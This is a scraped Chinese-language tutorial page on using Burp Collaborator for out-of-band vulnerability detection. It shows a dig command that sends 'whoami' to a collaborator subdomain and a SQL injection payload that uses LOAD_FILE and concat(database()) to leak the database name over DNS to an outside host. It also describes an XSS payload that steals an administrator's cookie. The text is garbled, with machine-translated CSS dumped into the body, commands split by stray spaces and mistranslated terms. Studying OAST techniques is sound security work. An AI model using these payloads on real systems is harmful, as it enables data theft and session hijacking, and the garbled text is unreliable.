當前位置:成語大全網 - 書法字典 - burp Collaborator-帶外應用檢測工具

burp Collaborator-帶外應用檢測工具

Burp Collaborator是OAST的產品,它可以幫助您實現不可見和異步響應的漏洞檢測。

目前Burp發布的新版本默認搭載了Burp Collaborator模塊。

Burp合作者模型指的是上面的帶外攻擊模型。

Burp Collaborator有自己的域名burpcollaborator.net,它類似於ceye平臺,並有壹個權威的DNS服務器。當用戶使用Collaborator模塊時,每個用戶將被分配壹個二級域名。

Burp Collaborator只是壹個客戶。我們可以使用Burp配置的默認帶外服務器或我們自己的私有服務器。

Burp合作者配置

您可以選擇使用默認配置外賣服務器,也可以設置自己的外賣服務器。

點擊運行健康檢查,測試外賣服務器服務是否正常。

打開Collaborator客戶端。

使用客戶端

使用dig查詢域名

& ltpre class =“MD-fences MD-end-block ty-contain-cm model loaded“spell check =“false“cid =“n53“MD type =“fences“style =“box-sizing:border-box;溢出:可見;字體系列:var(-等寬);字體大小:0.9em顯示:塊;內破:避免;文本對齊:左對齊;空白:正常;背景-圖像:繼承;背景-職位:繼承;背景-大小:繼承;背景-重復:繼承;背景-附件:繼承;背景-出身:繼承;背景-剪輯:繼承;背景色:RGB(248,248,248);位置:相對!重要;邊框:1px純色RGB(231,234,237);邊框半徑:3px填充:8px 4px 6px保證金-底部:15px;毛利-top:15px;寬度:繼承;顏色:RGB(51,51,51);字體樣式:正常;字體-變體-連字:正常;字體-變體-大寫:正常;字體粗細:400;字母間距:正常;孤兒:2人;文本縮進:0px文本轉換:無;寡婦:2人;字間距:0px-WebKit-text-stroke-width:0px;文字-裝飾-厚度:初始;文本-裝飾-樣式:初始;文本-裝飾-顏色:初始;“郎=““& gt;dig who ami . 7 Jr 9 GK 6 gtn six 33 jp 6181 Eu2 l8cw 1 . burpcollaborator . net & lt;/pre & gt;

查看客戶端返回的日誌

可以看到我們通過dig向服務器發送whoami的命令來查看DNS記錄。

使用Burp提供的射擊場介紹Burp Collaborator的使用方法。

操作原理

Burp Collaborator生成唯壹的域名,將它們作為有效負載發送到應用程序,並監控與這些域的任何交互。如果觀察到來自應用程序的傳入請求,則可以檢測到相應的漏洞。

檢波過程

將Burp Collaborator客戶端獲取的域名添加到HTTP請求的Referer位置,等待幾秒鐘,然後單擊“立即輪詢”查看應用程序啟動的DNS和HTTP交互。

我使用sqli的射擊場來演示使用burp Collaborator實現DNSLog註入。

前提條件:secure_file_priv為空(如果不為空,則只能讀取相應目錄中的文件)。

select 1,2,LOAD _ FILE(concat(‘\ \ \ \‘,database(),‘~‘,‘xwxb 0 b 0 bnpm 5 bnjbo 19 apeivpmvfj 4 . burpcollaborator . net \ \ a‘)-+

在xss payload中,添加由您自己的burp合作者生成的域名。

等待管理員檢查註釋可以觸發xss有效負載來獲取cookie。

還有更多的用途,期待妳的發現。